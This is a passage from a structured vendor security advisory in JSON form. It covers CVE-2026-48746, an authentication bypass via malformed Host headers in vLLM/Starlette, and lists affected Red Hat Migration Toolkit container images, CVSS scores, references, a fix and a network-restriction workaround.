"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"threats": [
{
"category": "impact",
"details": "Moderate"
}
],
"title": "starlette: Starlette: Security restriction bypass via malformed HTTP Host header"
},
{
"cve": "CVE-2026-48746",
"cwe": {
"id": "CWE-501",
"name": "Trust Boundary Violation"
},
"discovery_date": "2026-06-22T23:00:57.824402+00:00",
"flags": [
{
"label": "vulnerable_code_not_present",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"ids": [
{
"system_name": "Red Hat Bugzilla ID",
"text": "2491581"
}
],
"notes": [
{
"category": "description",
"text": "A flaw was found in vLLM, an inference and serving engine for large language models (LLMs). This vulnerability, residing in ASGI web servers and Starlette\u0027s trust in them, allows an attacker to bypass the OpenAI API Authentication Middleware. This bypass enables unauthorized access to the API without requiring the configured VLLM_API_KEY or --api-key, leading to critical unauthorized operations.",
"title": "Vulnerability description"
},
{
"category": "summary",
"text": "vllm: starlette: vLLM: Critical authentication bypass allows unauthorized API access",
"title": "Vulnerability summary"
},
{
"category": "other",
"text": "CVE-2026-48746 is an authentication bypass in the vLLM OpenAI-compatible API server. A remote attacker who can reach the vLLM endpoint directly can craft a Host header so the authentication middleware checks a different URL path than the one actually dispatched, bypassing VLLM_API_KEY / --api-key protection. Successful exploitation allows unauthorized inference API access, which can result in confidentiality loss (model/prompt abuse) and availability impact (resource exhaustion). The flaw does not provide integrity compromise or arbitrary code execution. Exploitation requires vLLM API-key authentication to be enabled and the service to be exposed without an RFC-conforming reverse proxy that normalizes the Host header. Because Red Hat AI inference offerings are commonly deployed behind OpenShift Routes or similar proxies, and because the vulnerability is conditional on deployment and configuration, the overall flaw impact is rated Important rather than Critical.",
"title": "Statement"
},
{
"category": "general",
"text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
"title": "CVSS score applicability"
}
],
"product_status": {
"fixed": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"known_not_affected": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
},
"references": [
{
"category": "self",
"summary": "Canonical URL",
"url": "https://access.redhat.com/security/cve/CVE-2026-48746"
},
{
"category": "external",
"summary": "RHBZ#2491581",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2491581"
},
{
"category": "external",
"summary": "https://www.cve.org/CVERecord?id=CVE-2026-48746",
"url": "https://www.cve.org/CVERecord?id=CVE-2026-48746"
},
{
"category": "external",
"summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-48746",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-48746"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/pull/43426",
"url": "https://github.com/vllm-project/vllm/pull/43426"
},
{
"category": "external",
"summary": "https://github.com/vllm-project/vllm/security/advisories/GHSA-94f4-hr76-p5j6",
"url": "https://github.com/vllm-project/vllm/security/advisories/GHSA-94f4-hr76-p5j6"
},
{
"category": "external",
"summary": "https://x41-dsec.de/lab/advisories/x41-2026-002-starlette",
"url": "https://x41-dsec.de/lab/advisories/x41-2026-002-starlette"
}
],
"release_date": "2026-06-22T21:57:28.997000+00:00",
"remediations": [
{
"category": "vendor_fix",
"date": "2026-07-21T22:10:10+00:00",
"details": "Before applying this update, make sure all previously released errata\nrelevant to your system have been applied.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64"
],
"restart_required": {
"category": "none"
},
"url": "https://access.redhat.com/errata/RHSA-2026:43038"
},
{
"category": "workaround",
"details": "Restrict network access to the vLLM API endpoint to only trusted clients and internal networks. Implement firewall rules or network policies to limit inbound connections to the vLLM service, thereby reducing the attack surface. This operational control helps prevent unauthorized external access to the vulnerable API.",
"product_ids": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:25618ee8a690f336e1604a1b1ca9dd5197bbdea5cd02cfaf588fbd950a8fd228_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-python-external-provider-rhel9@sha256:4f46867f5ff78e9e970bc572a1a625080ae8faea29dc098d3d7d4355e8350ca1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:3926f791376886972749cae0f8eb635af67a088811214066c6deb010c6b762f0_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-rhel9-operator@sha256:957a553608cbf9ed108c22f851ef809ed348cf592610851c3a554f3342ba511a_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:21fab4b77580795980fd60b24ab1d6a3cc159a9246beccd1c19938bca94edd23_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-solution-server-rhel9@sha256:f8c8651cc5fa016003ef4105f28775e0b225472d2c3135e5f37d1e1f748c515e_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:a77f5a731c20943958b5f654bf3147b690d5dd608b794bff261a23dd89f785f1_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-ui-rhel9@sha256:f59dcacb1eed9bcd539bc6c26a630115cf35378d77075247fb42219836e2adb7_arm64"
]
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.1,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H",
"version": "3.1"
},
"products": [
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:1e20ac649ee7fdcdad9930b1f0384e10c8794db9a2f211d4e3d1679c0c10cc53_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-analyzer-addon-rhel9@sha256:907c0c8c40c1fb494caa5feac439b90754160bf3f79d8e76cf2dded63f549db6_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:d466bf042711b13fc53cbc561b70e4f58cd77f8a05d1d4ee10c10a6e1c201fe7_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-cli-rhel9@sha256:ecae0c1053637d609a19773757c0ea8b336b645950a42473015daabfe9677fab_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:7377a2c2f16ca436819cbbf106fc27d3a8c44c7fca0a44108ccc826bf8678ace_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-discovery-addon-rhel9@sha256:a72cbf7b2ba6420e31ecca15f7d3628a671dd642a6ccf4610c5a26462a5d4b36_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:794180378ddb9a88001d76b849df305034924683a79ef145f744fe03bee9c32b_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-dotnet-external-provider-rhel9@sha256:b5d66f8d4c6d6680886e631296c927c9502817fbb823a680f1dabf1cc92e0465_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8e5ba3659ef5f88b81c1c9d795b6af6048fd7d870493ce5f013efcb9fce90b9d_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-go-external-provider-rhel9@sha256:8f91d460985e1a97ac6892d26c0517f39871d94d1b3bfad005d58d424bed2b0b_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:0223927b9e584f302aabafdbf015a779b14c9b5816cf0baa0cb1bfe0b1cc3415_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-hub-rhel9@sha256:2e251b0343327f2ac6e60d2888da526be6a82a355310f1aea93011426cddc485_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:60c4a45085db3517f6a9bae32a4b93fd2dfa799c3e957776ad2d8ab0777507c2_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-java-external-provider-rhel9@sha256:e8bd699e851fbab4466d1d25e3a08e2bcf8997978cb7f19f509c627be42d03dd_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:12883516af95bf0f6abad1556d22896f16a087c1e4191fedc1f5d689cf6d67f6_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-nodejs-external-provider-rhel9@sha256:a89c4d19ff39a406f3279b4ffd6f8d2a2a82a78ab3e9aa1dc0f2c385a24fa844_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-operator-bundle@sha256:94f88bf557a036c54b348c2689c699a720d5d347b1bba141feec273e624ccdbf_amd64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:647ca556be4338749fbe7cb18580466ce6155bfce17c96deda7b7c037fd16240_arm64",
"Red Hat Migration Toolkit for Applications 8.2:registry.redhat.io/mta/mta-platform-addon-rhel9@sha256:f421044ff3d6911097aebcbabfac87ddad74987e0e5f18a96dd89454f46a4cdf_amd64",
